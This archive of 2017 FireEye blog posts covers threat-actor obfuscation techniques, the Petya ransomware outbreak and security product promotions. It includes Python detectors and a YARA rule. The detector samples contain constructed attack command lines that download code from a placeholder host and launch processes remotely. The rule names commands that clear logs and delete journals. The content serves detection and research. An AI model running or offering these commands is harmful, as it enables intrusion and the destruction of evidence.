Category Archives: FireEye


Kevin Mandia, CEO of FireEye, Speaks at DoDIIS17 About Cybersecurity

Category : FireEye

Kevin Mandia, CEO of FireEye, talks about Russia, China, Iran, North Korea and cyber security at DoDIIS17



The CISO’s Most Effective Weapon, Threat Intelligence


Today’s most successful CISOs embrace cyber threat intelligence (CTI). Contextual, high-fidelity intelligence helps security teams understand attackers and prioritize responses to give organizations the upper hand.

Download The CISO’s Most Effective Weapon: Threat Intelligence white paper to learn:

  • What differentiates actionable threat intelligence from undifferentiated volumes of alert data
  • Why security teams must understand the motives and abilities of adversaries in context
  • How to transition from reliance on low-quality threat feeds and regulatory concerns to security programs that effectively recognize and respond to attacks.

Get your white paper today.


Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science


Many attackers continue to leverage PowerShell as a part of their malware ecosystem, mostly delivered and executed by malicious binaries and documents. Of malware that uses PowerShell, the most prevalent use is the garden-variety stager: an executable or document macro that launches PowerShell to download another executable and run it. There has been significant development and innovation in the field of offensive PowerShell techniques. While defenders and products have implemented greater PowerShell visibility and improved detection, the offensive PowerShell community has adapted their tools to avoid signature-based detections. Part of this response has come through an increased use of content obfuscation – a technique long employed at both the binary and content level by traditional malware authors.

In our Revoke-Obfuscation white paper, first presented at Black Hat USA 2017, we provide background on obfuscated PowerShell attacks seen in the wild, as well as defensive mitigation and logging best practices. We then make the case for the inefficiencies of static detection by exploring the many layers of obfuscation now available to attackers for launching PowerShell scripts, shortening and complicating commands contained within the scripts, manipulating strings, and using alternate and obscure methods to evade defenders. We then present a number of unique approaches for interpreting, categorizing, and processing obfuscated PowerShell attributes in order to build a framework for high fidelity obfuscation detection. To support our research, we collected an unprecedented PowerShell data corpus comprised of 408,000 scripts – including 7,000 manually-reviewed and labeled scripts – from a vast set of sources, both public and previously unavailable. In addition to releasing the PowerShell data corpus, we have released the Revoke-Obfuscation framework, which has been used in numerous Mandiant investigations, to assist the security community in classifying PowerShell scripts’ obfuscation at scale.
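As an added illustration of the feature-based approach the paper describes (this is not Revoke-Obfuscation's own code: it uses a handful of hand-chosen character-ratio features with assumed thresholds, where the real framework extracts thousands of features and trains a classifier on the labeled corpus; both sample scripts are constructed):

```python
# Constructed samples (not from the FireEye corpus): a plain stager and the same
# download-and-run intent hidden behind backticks, string concatenation and case flipping.
PLAIN = ("Invoke-WebRequest -Uri http://example.invalid/update.exe -OutFile update.exe; "
         "Start-Process update.exe")
OBFUSCATED = ("&('I'+'nv'+'oke-Ex'+'pression') (\"`I`N`v`O`k`E`-w`E`b`R`e`Q`u`E`s`T "
              "-u`RI h`t`T`p://example.invalid/update.exe\")")

# Thresholds are assumed values chosen for this demo, not tuned against a corpus.
THRESHOLDS = {
    "backtick_ratio": 0.02,   # PowerShell escape character sprinkled inside tokens
    "concat_ratio": 0.015,    # '+' joining short string fragments
    "quote_ratio": 0.05,      # many short quoted fragments
    "special_ratio": 0.25,    # share of non-alphanumeric, non-space characters
    "case_flip_ratio": 0.30,  # upper/lower alternation between adjacent letters
}


def features(script):
    """Character-level ratios that rise sharply when a script is obfuscated."""
    n = max(len(script), 1)
    letters = [c for c in script if c.isalpha()]
    # Case flips between neighbouring letters ("iNvOkE") are rare in hand-written code.
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return {
        "backtick_ratio": script.count("`") / n,
        "concat_ratio": script.count("+") / n,
        "quote_ratio": (script.count("'") + script.count('"')) / n,
        "special_ratio": sum(1 for c in script if not c.isalnum() and not c.isspace()) / n,
        "case_flip_ratio": flips / max(len(letters), 1),
    }


def triggered(script):
    """Names of the features whose value exceeds its threshold."""
    f = features(script)
    return [name for name, limit in THRESHOLDS.items() if f[name] > limit]


def is_obfuscated(script, min_hits=2):
    """Require two independent signals so one odd feature does not flag a script."""
    return len(triggered(script)) >= min_hits


if __name__ == "__main__":
    for label, script in (("plain", PLAIN), ("obfuscated", OBFUSCATED)):
        print(label, is_obfuscated(script), triggered(script))
```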

Download the Revoke-Obfuscation white paper today.


Author: Daniel Bohannon, Lee Holmes 


In EternalPetya’s Wake, How Could Regulators Punish Victims?


The EternalPetya (aka NotPetya, NonPetya, ExPetr) virus that quickly spread to innumerable systems at the end of June left a trail of destruction across the globe. Businesses of all sizes have publicly acknowledged that they will suffer materially negative economic consequences from the attack, with more sure to come.

The impact of EternalPetya’s rampage extends far beyond the immediate concerns of restarting and rebuilding information technology capabilities. Threats of criminal charges loom for some in Europe, while here in the U.S. regulators are ramping up investigations into why and how badly companies fell victim to this cyber campaign.

In the lead is the New York Department of Financial Services (DFS), which has implemented one of the toughest cybersecurity regulatory schemes in the nation. In a Wall Street Journal Pro Cybersecurity Commentary & Analysis piece emailed to subscribers, New York DFS Superintendent Maria T. Vullo said her agency has already been in contact with regulated entities to “ensure appropriate steps are taken,” as attacks like EternalPetya “reinforce the critical need for minimal regulatory standards and robust cybersecurity programs.”

In light of Superintendent Vullo’s statement, what sections of the new cybersecurity rule should DFS-regulated entities focus on when New York pays them a visit? Here are some thoughts:

  • 500.02 – Cybersecurity Program: DFS is sure to look to see whether the overall program was adequate/sufficient.
  • 500.03 – Cybersecurity Policy: DFS will no doubt investigate the sufficiency of individual policies, including business continuity/disaster recovery and incident response policies.
  • 500.05 – Penetration Testing and Vulnerability Assessments: Questions will likely be asked about whether penetration testing should have caught the entry points used by EternalPetya, as well as whether its consequences were adequately considered.
  • 500.09 – Risk Assessments: DFS is sure to investigate whether the underlying risk assessment was “sufficient.”
  • 500.11 – Third Party Service Provider Security Policy: This will be a big question mark for DFS, as even if the regulated entity itself wasn’t hit, almost assuredly some of its service providers were. DFS can ask whether the due diligence and minimum security procedures hit the appropriate benchmarks in light of EternalPetya-caused disruptions.
  • 500.16 – Incident Response Plans: This is self-explanatory. For any regulated entity that suffered some sort of service disruption, DFS will carefully examine whether its incident response plans were properly designed to allow for “prompt” response and recovery. This is especially true since the rule explicitly talks about incident response plans in the context of cyber attacks impacting the integrity, availability, and continuing functionality of information systems and business generally.

Two important notes here. First, the sections listed above are by no means intended to be exhaustive. Rather, the list is intended to show how much leeway the new rule gives DFS to declare that a regulated financial entity is out of compliance and thus potentially subject to fines.

Second, the DFS cybersecurity rule is still being phased in. DFS does not yet have the authority to impose fines, and in some cases will not have the power to do so for upwards of 18 months.

Part of the inquiries into the scope of EternalPetya’s impact will no doubt focus on how vulnerable companies are to exploits and hacking tools allegedly taken from U.S. government agencies. Hackers have quickly grown adept at weaponizing these exploits to conduct prolific malware campaigns that impact hundreds of organizations across the globe.

EternalPetya and the WannaCry campaigns leveraged an SMB (Server Message Block) exploit dubbed EternalBlue to allow the malware to spread rapidly within a penetrated organization. The propagation mechanism enabled the rapid distribution of the malware both within a compromised network and over the public Internet.

EternalBlue was leveraged in the EternalPetya campaign as well, but additional tactics were also deployed to ensure effective propagation in environments where EternalBlue was not effective. The ramifications for the incorporation of worm-like features within ransomware, or destructive or disruptive malware in general, substantively intensifies threats within an already massively expanding threat landscape. Furthermore, the widespread availability of ransomware and these exploits coupled with the highly-publicized effectiveness of these campaigns – at least in terms of propagation – has undoubtedly resonated among a variety of different threat actors, all with different motivations.

Even before this development, FireEye had observed a significant escalation in the scope and sophistication of cyber extortion tools. Having already demonstrated utility in financially-motivated campaigns, it is also possible for these tools to be increasingly used by nation-states, likely as a means of compellence. Given the likely nexus to nation-state actors, the WannaCry and EternalPetya campaigns subscribe to this narrative.

The lessons of EternalPetya should be painfully clear then to New York DFS regulated entities and for others who fall under the jurisdiction of some form of government regulation: regulators will have plenty of ways to declare that the security measures of cyber victims were somehow inadequate, thereby exposing them to punishment.

So beware those who are regulated – the actual cyber attack is likely to be only the first round of pain to be inflicted.


Author: Brian Finch, David Mainor



Government Moves to the Cloud – FireEye Government Email Threat Prevention Receives FedRAMP Authorization


Given recent high-profile incidents, cyber security has quickly risen to the top of the priority list for many organizations, including governments. The U.S. government has increased its annual cyber security budget by 35 percent, going from $14 billion budgeted in 2016 to $19 billion in 2017, and reports indicate that governments around the globe are expected to double down on cyber protection this year.

As with many organizations these days, government information technology and security is migrating to the cloud. This is largely driven by the federal CIO “Cloud First” mandate specifying that agencies consider cloud services first for procurements when meeting security, reliability and cost requirements. Cloud-delivered products can significantly reduce cost and complexity compared to on-premises products, so it’s no surprise that cloud services are coming out on top.

Email Migration to the Cloud

As government and public education entities migrate to Office 365, Google Mail or other solutions for their primary email management service, they’re also looking for email security that delivers advanced threat protection, and this requires a service that is FedRAMP authorized.

FireEye Government Email Threat Prevention (ETP), an email security service focused on advanced threat protection, was granted an Authority to Operate (ATO) by the U.S. Department of the Interior (DOI) on April 26, 2017 and achieved a FedRAMP Authorization on July 5, 2017.

Government ETP enables government entities to save time and money as they add email security for advanced threat protection. Governments can now confirm that the DOI authorization package meets their security requirements and issue their own ATOs in parallel with the procurement process, accelerating their migration to using Government ETP.

FireEye Government ETP is available today as a subscription, ensuring customers continue to benefit from intelligence-led feature updates at no additional cost. For existing FireEye EX appliance customers, upgrade programs are available.

Learn more about FireEye Government ETP, and check out our podcast to hear FireEye CTO Grady Summers speak with FireEye Global Government CTO Tony Cole and Risk Management Lead Stacey Ziegler about how FireEye will support the government as it moves to the cloud.


Author: Elizabeth Flammini


Are you Ready to Respond?


“In our current state of cyber security, security breaches are inevitable.” — Kevin Mandia, CEO, FireEye

In 2016 there were 1,093 publicized cyber security breaches. That’s a 40% increase from 2015. Given this era’s upsurge in breach activity, it’s no longer about whether you’ll be breached. It’s how you’ll respond when you are breached. Organizations with a well-designed response capability are better off.

Join Troy Scavella, FireEye Principal Consultant and Ahmet Rifki, Sr. Consultant for our webinar on July 20. They will cover several topics, including:

  • Six primary areas of focus for an effective response plan
  • Best practices for each of those areas
  • Examples of how deficiencies in any area reduce an organization’s ability to effectively detect and respond to a cyber security incident, whether targeted or opportunistic.

Jul 20 2017 11:00 am

Duration: 60 min

Featured Speakers

Troy Scavella
Principal Consultant
FireEye, Inc.

Ahmet Rifki
Sr. Consultant
FireEye, Inc.


Are You Ready to Respond? Evaluate and Improve Your Ability to Respond to the Next Attack


“In our current state of cyber security, security breaches are inevitable. This is an important fact, so I am intentionally repeating it. In our current state of cyber security, security breaches are inevitable.”
FireEye CEO Kevin Mandia, 2011

It has been nearly six years, but not much has changed since FireEye CEO Kevin Mandia spoke those words during his testimony to the U.S. House Permanent Select Committee on Intelligence at an October 2011 hearing.

Having systems in place to prevent as many breaches as possible is only one piece of a thorough defense. Today’s advanced threat landscape also requires a detailed incident response strategy to detect and respond to a breach, along with the expertise to execute it. As soon as an organization identifies an attacker in their network, they need to move quickly to minimize damage to their infrastructure, their brand and their customers.

In our white paper, Are You Ready to Respond? Evaluate and Improve Your Ability to Respond to the Next Attack, we discuss why an incident response plan is essential for every organization, and discuss in detail six key areas for every response plan:

  • Governance
  • Communication
  • Visibility
  • Intelligence
  • Response
  • Metrics

Additionally, the report discusses our approach to assessing an organization’s readiness, and details how we rank each of the six aforementioned capabilities on a scale of 0 to 5. By the end of the report, organizations will have a clear vision of how to:

  • Develop a response plan that safeguards critical systems and information without disrupting core business functions.
  • Improve their response system to shorten the time between detecting an intrusion and resolving the breach.
  • Evolve their response plan as needs change.

Download the white paper today.


Targeted Attackers Lead the Way in Evasion Techniques


Throughout 2017 we have observed a marked increase in the use of command line evasion and obfuscation by a range of targeted attackers. Cyber espionage groups and financial threat actors continue to adopt the latest cutting-edge application whitelisting bypass techniques and introduce innovative obfuscation into their phishing lures. These techniques often bypass static and dynamic analysis methods and highlight why signature-based detection alone will always be at least one step behind creative attackers.

In early 2017, FIN8 began using environment variables paired with PowerShell’s ability to receive commands via StdIn (standard input) to evade detection based on process command line arguments. In the February 2017 phishing document "COMPLAINT Homer Glynn.doc" (MD5: cc89ddac1afe69069eb18bac58c6a9e4), the file contains a macro that sets the PowerShell command in one environment variable (_MICROSOFT_UPDATE_CATALOG) and then the string "powershell -" in another environment variable (MICROSOFT_UPDATE_SERVICE). When a PowerShell command ends in a dash, PowerShell executes the command that it receives via StdIn, and only this dash appears in powershell.exe’s command line arguments. Figure 1 provides the commands that were extracted using Mandiant consultant Nick Carr’s FIN8 macro decoder.

Figure 1: FIN8 environment variable commands extracted from “COMPLAINT Homer Glynn.doc” macros

To evade many detections based on parent-child process relationships, FIN8 crafted this macro to use WMI to spawn the cmd.exe execution. Therefore, WinWord.exe never creates a child process, but the process tree looks like: wmiprvse.exe > cmd.exe > powershell.exe. FIN8 has regularly used obfuscation and WMI to remotely launch their PUNCHTRACK POS-scraping malware, and the 2017 activity is an implementation of these evasion techniques at an earlier stage of compromise.

As new application whitelisting bypass techniques have surfaced, targeted attackers have quickly adopted these into their campaigns with extra layers of obfuscation to stay ahead of many defenders. Many groups leverage the regsvr32.exe application whitelisting bypass, including APT19 in their 2017 campaign against law firms. The cyber espionage group APT32 heavily obfuscates their backdoors and scripts, and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017. Instead of using the argument /i:http for the regsvr32.exe bypass, APT32 used cmd.exe obfuscation techniques to attempt to break signature-based detection of this argument. At FireEye we have seen them include both /i:^h^t^t^p and /i:h"t"t"p in their lures. Figure 2 shows a redacted screenshot of our Host Investigative Platform (HIP) capturing real-time attacker activity during one of our Mandiant incident response engagements for APT32 activity.

Figure 2: APT32 command obfuscation for regsvr32.exe application whitelisting bypass

Meanwhile, FIN7 has continued to wreak havoc on the restaurant, hospitality, and financial services sectors in 2017. To ensure their arsenal did not grow stale, in April 2017 FIN7 shifted to using wscript.exe to run JavaScript payloads that retrieve an additional payload hidden in the phishing document by use of the Word.Application COM object.

This week, FireEye identified FIN7 introducing additional obfuscation techniques at both the JavaScript and cmd.exe levels. These methods rely on FIN7’s preferred method of hiding shortcut files (LNK files) in their DOCX and RTF phishing documents to initiate the infection. At the time of this blog, the files implementing this technique were detected by 0 antivirus engines. For JavaScript, instead of specifying "Word.Application" for the COM object instantiation, FIN7 began concatenating the string as "Wor"+"d.Application". In addition, JavaScript’s suspicious "eval" string was transformed into this[String.fromCharCode(101)+'va'+'l']. Finally, they used a little-known character replacement functionality supported by cmd.exe. The wscript.exe command is set in a process-level environment variable "x", but is obfuscated with the "@" character. When the "x" variable is echoed at the end of the script, the "@" character is removed by the syntax %x:@=%. Figure 3 shows this command extracted from a LNK file embedded within a new FIN7 phishing document.

Figure 3: FIN7 command obfuscation from LNK file phishing document

In this example, FIN7 implements FIN8’s passing of commands via StdIn – this time passing it to cmd.exe instead of powershell.exe – but the evasion effect is the same. While this example will expose these arguments in the first cmd.exe’s command execution, if this environment variable were set within the LNK or a macro and pushed to cmd.exe via StdIn from VBA, then nothing would appear on the command line.

The FireEye iSIGHT Intelligence MySIGHT Portal contains detailed information on these attackers – and all financial and cyber espionage groups that we track – including analysis of their malware, tactics, and further intelligence attribution.

We fully expect targeted attackers to continue this pattern of adopting new bypass techniques and adding innovative obfuscation at both the macro and command line levels. As for what we might see next, we’d recommend reading up on DOS command line tricks so that monitoring your network isn’t the first time you see new attacker tricks. Network defenders must understand what obfuscation is possible, assess their endpoint and network visibility, and most importantly not rely on a single method to detect these attacks.
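As an added, constructed example (not FireEye's code, and not the Figure 1 to 3 artefacts, whose command lines are not reproduced here), the normaliser below undoes the cmd.exe-level tricks described above before any signature is applied, so that a caret-split or quote-split /i:http, a %x:@=% substitution, or a lone trailing dash to powershell.exe is matched by the same rule as the plain form; hosts and file names in the samples are placeholders.

```python
import re

# Constructed command lines modelled on the tricks described above; they are not
# the attacker artefacts from the post (hosts and file names are placeholders).
SAMPLES = {
    "apt32_caret": 'regsvr32.exe /s /n /u /i:^h^t^t^p://example.invalid/a.sct scrobj.dll',
    "apt32_quote": 'regsvr32.exe /s /n /u /i:h"t"t"p://example.invalid/a.sct scrobj.dll',
    "fin7_subst": 'cmd.exe /c "set x=wsc@ript //e:jscript payload.txt&&call %x:@=%"',
    "fin8_stdin": "powershell -",
    "wmi_launch": 'wmic /node:192.0.2.10 process call create "cmd.exe /c payload.bat"',
    "benign_ps": "powershell -NoProfile -File maintenance.ps1",
    "benign_reg": "regsvr32.exe /s legit.dll",
}

SET_RE = re.compile(r'\bset\s+(\w+)=([^&"]*)', re.IGNORECASE)
SUBST_RE = re.compile(r"%(\w+):([^=%]+)=([^%]*)%")   # %VAR:search=replace%
VAR_RE = re.compile(r"%(\w+)%")


def normalize_cmd(cmdline):
    """Return the command as the child process would see it after cmd.exe parsing."""
    # Assignments made earlier in the same command line feed later expansions.
    env = {m.group(1).lower(): m.group(2) for m in SET_RE.finditer(cmdline)}
    # Caret is cmd.exe's escape character; it never reaches the child (/i:^h^t^t^p -> /i:http).
    text = cmdline.replace("^", "")
    # Quote marks inside a token are consumed by argument parsing (/i:h"t"t"p -> /i:http).
    text = text.replace('"', "")

    def substitute(m):
        name, search, replace = m.group(1).lower(), m.group(2), m.group(3)
        if name not in env:
            return m.group(0)                       # unknown variable: leave as-is
        return env[name].replace(search, replace)   # %x:@=% strips every '@' from x

    text = SUBST_RE.sub(substitute, text)
    text = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)
    return text


# Obfuscation itself is a signal, independent of what the command turns out to be:
# a caret, a quote wedged inside a word, or a %VAR:search=replace% expansion.
OBFUSCATION_RE = re.compile(r'\^|\w"\w|%\w+:[^=%]+=[^%]*%')

INDICATORS = {
    "regsvr32_remote_scriptlet": re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:https?://", re.I),
    # A lone trailing dash means the real command arrives on StdIn, not on the command line.
    "powershell_stdin_dash": re.compile(r"\bpowershell(\.exe)?\s+-\s*$", re.I),
    "wscript_jscript_payload": re.compile(r"\bwscript(\.exe)?\b.*//e:jscript", re.I),
    "wmic_remote_process": re.compile(r"\bwmic\b.*/node:.*process\s+call\s+create", re.I),
}


def detect(cmdline):
    """Return (normalised command, names of the indicators that fired)."""
    norm = normalize_cmd(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    if OBFUSCATION_RE.search(cmdline):
        hits.append("command_line_obfuscation")
    return norm, hits


if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        norm, hits = detect(cmd)
        print(f"{label:12} {hits}\n  raw : {cmd}\n  norm: {norm}")
```

Note that for the FIN8 case nothing but the dash is visible on the command line, so the matching rule only tells you to go and look at the script block or StdIn logging you have in place.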


Author: Daniel Bohannon, Nick Carr


Petya Ransomware Spreading Via EternalBlue Exploit


On June 27, 2017, multiple organizations – many in Europe – reported significant disruptions they are attributing to Petya ransomware. Based on initial information, this variant of the Petya ransomware may be spreading via the EternalBlue exploit used in the WannaCry attack from last month.

Trusted sources and open-source reporting have suggested that the initial infection vector for this campaign was a poisoned update for the MeDoc software suite, a software package used by many Ukrainian organizations. The timing of a MeDoc software update, which occurred on June 27, is consistent with initial reporting of the ransomware attack, and the timing correlates to lateral movement via PSExec we observed in victim networks starting around 10:12 UTC. Additionally, the MeDoc website currently displays a warning message in Russian stating: “On our servers is occurring a virus attack. Our apologies for the temporary inconvenience!”

Our initial analysis of the artifacts and network traffic at victim networks indicates that a modified version of the EternalBlue SMB exploit was used, at least in part, to spread laterally, along with WMI commands, Mimikatz, and PsExec to propagate to other systems. Analysis of the artifacts associated with this campaign is still ongoing and we will update this blog as new information becomes available.

FireEye has confirmed the following two samples related to this attack:

  • 71b6a493388e7d0b40c83ce903bc6b04
  • e285b6ce047015943e685e6638bd837e

FireEye has mobilized a Community Protection Event and is continuing to investigate these reports and the threat activity involved in these disruptive incidents. FireEye as a Service (FaaS) is actively engaged in monitoring customer environments.

While FireEye detection leverages behavioral analysis of malicious techniques, our team has created a YARA rule to assist organizations in retroactively searching their environments for this malware, as well as detecting future activity. Our team has focused on the malicious attacker techniques that are core to the operation of the malware: SMB drive usage, ransom demand language, the underlying functions and APIs, and the system utilities used for lateral movement. The thresholds can be modified in the condition section that follows.

rule Probable_PETYA_EternalBlue_WMIC_PsExec   // rule name is not given on the page; supplied here
{
    meta:
        author = " @TekDefense,"
        description = "Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec"

    strings:
        // -- Raw disk access and lateral-movement shares
        $dmap01 = "\\\\.\\PhysicalDrive" nocase ascii wide
        $dmap02 = "\\\\.\\PhysicalDrive0" nocase ascii wide
        $dmap03 = "\\\\.\\C:" nocase ascii wide
        $dmap04 = "TERMSRV" nocase ascii wide
        $dmap05 = "\\admin$" nocase ascii wide
        $dmap06 = "GetLogicalDrives" nocase ascii wide
        $dmap07 = "GetDriveTypeW" nocase ascii wide

        // -- Ransom demand and fake CHKDSK language
        $msg01 = "WARNING: DO NOT TURN OFF YOUR PC!" nocase ascii wide
        $msg02 = "IF YOU ABORT THIS PROCESS" nocase ascii wide
        $msg03 = "DESTROY ALL OF YOUR DATA!" nocase ascii wide
        $msg05 = "your important files are encrypted" ascii wide
        $msg06 = "Your personal installation key" nocase ascii wide
        $msg07 = "worth of Bitcoin to following address" nocase ascii wide
        $msg08 = "CHKDSK is repairing sector" nocase ascii wide
        $msg09 = "Repairing file system on " nocase ascii wide
        $msg10 = "Bitcoin wallet ID" nocase ascii wide
        // $msg11 = "" nocase ascii wide   // string text is missing from the page; YARA rejects an empty string
        $msg12 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" nocase ascii wide
        $msg_pcre = /(en|de)crypt(ion|ed\.)/

        // -- Underlying functions and APIs
        $functions01 = "need dictionary" nocase ascii wide
        $functions02 = "comspec" nocase ascii wide
        $functions03 = "OpenProcessToken" nocase ascii wide
        $functions04 = "CloseHandle" nocase ascii wide
        $functions05 = "EnterCriticalSection" nocase ascii wide
        $functions06 = "ExitProcess" nocase ascii wide
        $functions07 = "GetCurrentProcess" nocase ascii wide
        $functions08 = "GetProcAddress" nocase ascii wide
        $functions09 = "LeaveCriticalSection" nocase ascii wide
        $functions10 = "MultiByteToWideChar" nocase ascii wide
        $functions11 = "WideCharToMultiByte" nocase ascii wide
        $functions12 = "WriteFile" nocase ascii wide
        $functions13 = "CoTaskMemFree" nocase ascii wide
        $functions14 = "NamedPipe" nocase ascii wide
        $functions15 = "Sleep" nocase ascii wide // imported, not in strings

        // -- Clearing event logs & USNJrnl
        $cmd01 = "wevtutil cl Setup" ascii wide nocase
        $cmd02 = "wevtutil cl System" ascii wide nocase
        $cmd03 = "wevtutil cl Security" ascii wide nocase
        $cmd04 = "wevtutil cl Application" ascii wide nocase
        $cmd05 = "fsutil usn deletejournal" ascii wide nocase
        // -- Scheduled task and forced reboot
        $cmd06 = "schtasks " nocase ascii wide
        $cmd07 = "/Create /SC " nocase ascii wide
        $cmd08 = " /TN " nocase ascii wide
        $cmd09 = "at %02d:%02d %ws" nocase ascii wide
        $cmd10 = "shutdown.exe /r /f" nocase ascii wide
        // -- Sysinternals/PsExec and WMIC
        $cmd11 = "-accepteula -s" nocase ascii wide
        $cmd12 = "wmic"
        $cmd13 = "/node:" nocase ascii wide
        $cmd14 = "process call create" nocase ascii wide

    condition:
        // (uint16(0) == 0x5A4D)   // uncomment to restrict the rule to PE files (MZ header)
        3 of ($dmap*)
        and 2 of ($msg*)
        and 9 of ($functions*)
        and 7 of ($cmd*)
}

FireEye has read reports that the malware is spread by an email lure containing a malicious Office document attachment or links to infected documents exploiting CVE-2017-0199. We are confident that this document is unrelated to the current outbreak of activity, and we have seen no other indicators that CVE-2017-0199 is related. While FireEye detects these campaigns, we have not observed any correlation with known victims of the Petya attacks.


This activity highlights the importance of organizations securing their systems against the EternalBlue exploit and ransomware infections. Microsoft has provided a guide for securing Windows systems against the EternalBlue exploit in the context of the WannaCry ransomware. A robust back-up strategy, network segmentation and air gapping where appropriate, and other defenses against ransomware can help organizations defend against ransomware distribution operations and quickly remediate infections.


Author:  John Miller, Matt Allen, Christopher Glyer, Ian Ahl, Nick Carr


Resolve security incidents quickly, efficiently and at scale


Your business is your top priority. At best, attacks are a distraction. At their worst, they can cripple your operations.

Mandiant, a FireEye company, has dedicated incident responders in over 30 countries to help you quickly investigate and thoroughly remediate attacks, so you can get back to what matters most: your business. Mandiant helps protect you with more than a decade of experience responding to thousands of incidents and conducting intrusion investigations.

Our consultants combine their expertise with industry-leading threat intelligence and network and endpoint technology to help you with a wide range of activities — from technical response to crisis management. Whether you have 1,000 or 100,000 endpoints, our consultants can be up and running in a matter of hours, analyzing your networks for malicious activity.